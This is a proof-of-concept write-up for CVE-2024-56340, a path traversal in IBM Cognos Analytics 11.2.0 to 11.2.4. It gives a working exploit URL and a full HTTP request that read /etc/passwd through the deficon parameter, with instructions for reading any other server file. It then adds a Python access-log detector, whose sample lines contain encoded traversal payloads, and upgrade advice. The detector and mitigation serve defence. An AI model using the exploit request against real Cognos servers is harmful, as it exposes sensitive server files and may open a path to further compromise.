
CVE-2024-56340 PoC — IBM Cognos Analytics Security Vulnerability

Associated Vulnerability
Title: IBM Cognos Analytics Security Vulnerability (CVE-2024-56340)
Description: IBM Cognos Analytics is a business intelligence suite from the US company International Business Machines (IBM). The software provides reports, dashboards and scorecards, and helps enterprises adjust their decisions by analysing key factors and key people. IBM Cognos Analytics versions 11.2.0 through 11.2.4 FP5 contain a security vulnerability caused by path traversal in the deficon parameter, which may lead to access to sensitive files.
Description
IBM Cognos Analytics Path Traversal, PoC of CVE-2024-56340
Readme
# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` 

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## PoC
After logging into IBM Cognos Analytics, if the user is authorised to reach the following URL, it is possible to read files stored server-side using path traversal payloads; in this case Unix payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Open this URL, replacing **domain** with the vulnerable host, to read /etc/passwd, or replace `%2fetc%2fpasswd` with the path of the file to read, with `/` URL-encoded as `%2f`:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read with the same traversal by putting the URL-encoded path of the target file in place of `%2fetc%2fpasswd`.

## Affected Version Details :

 - 11.2.0 $\le$ version $\le$ 11.2.4

## Impact :

An attacker can read files stored server-side on the host where the tool is installed. This can be a vector for RCE if certain conditions hold on the victim machine.
## Mitigation :

- Update to version > 11.2.4
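
Until the upgrade is applied, requests exploiting this bug are easy to spot in web-server access logs, because the `deficon` parameter of the `/thumbnail/` endpoint should never contain `..` segments. The following detector is an added example and not part of this PoC or of IBM's product; it assumes Apache/nginx combined log format, handles single- and double-percent-encoding, and runs over a few constructed sample lines.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter named in the advisory for CVE-2024-56340.
VULN_PATH = "/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/"
# A ".." path segment delimited by "/" or "\" (or at either end of the value).
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Combined-log-format fields: client, user, timestamp, method, target, status.
REQ_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines for this example; they are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Mar/2025:10:01:02 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1" 200 1420
10.0.0.6 - bob [12/Mar/2025:10:01:05 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=report.png&v=3 HTTP/1.1" 200 8800
10.0.0.7 - carol [12/Mar/2025:10:01:09 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?deficon=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 403 0
10.0.0.8 - dave [12/Mar/2025:10:02:00 +0000] "GET /ibmcognos/bi/v1/disp/ HTTP/1.1" 200 300
"""

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e) are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(line):
    """Return a finding dict if the line is a traversal attempt against the endpoint, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    src, user, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs already decodes one layer; fully_decode peels any further layers.
    for value in parse_qs(parts.query).get("deficon", []):
        decoded = fully_decode(value)
        if TRAVERSAL.search(decoded):
            return {"src": src, "user": user, "time": ts,
                    "status": int(status), "deficon": decoded}
    return None

def scan(log_text):
    """Scan a whole log and return the list of findings, in log order."""
    return [hit for hit in map(find_traversal, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response to a flagged request means the file was likely served, so treat it as an incident rather than a blocked probe.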
  
## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340